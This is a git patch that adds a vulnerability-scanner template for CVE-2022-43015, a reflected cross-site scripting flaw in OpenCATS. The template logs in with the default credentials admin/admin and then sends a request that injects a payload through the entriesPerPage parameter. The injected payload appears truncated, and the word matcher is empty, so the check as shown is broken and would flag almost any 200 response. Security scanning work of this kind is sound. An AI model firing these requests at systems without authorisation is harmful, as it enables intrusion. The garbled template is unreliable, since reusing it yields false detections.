From 5955a1e693fc2316f15f6369cc733dfdb37e0e65 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Tue, 25 Oct 2022 00:25:26 +0530
Subject: [PATCH] Create CVE-2022-43015.yaml
---
cves/2022/CVE-2022-43015.yaml | 37 +++++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
create mode 100644 cves/2022/CVE-2022-43015.yaml
diff --git a/cves/2022/CVE-2022-43015.yaml b/cves/2022/CVE-2022-43015.yaml
new file mode 100644
index 0000000000..7c5de65cf8
--- /dev/null
+++ b/cves/2022/CVE-2022-43015.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-43015
+
+info:
+ name: OpenCATS - Cross Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43015
+ tags: xss,cve,2022
+
+requests:
+ - raw:
+ - |
+ POST /index.php?m=login&a=attemptLogin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=admin&password=admin
+
+ - |
+ GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ''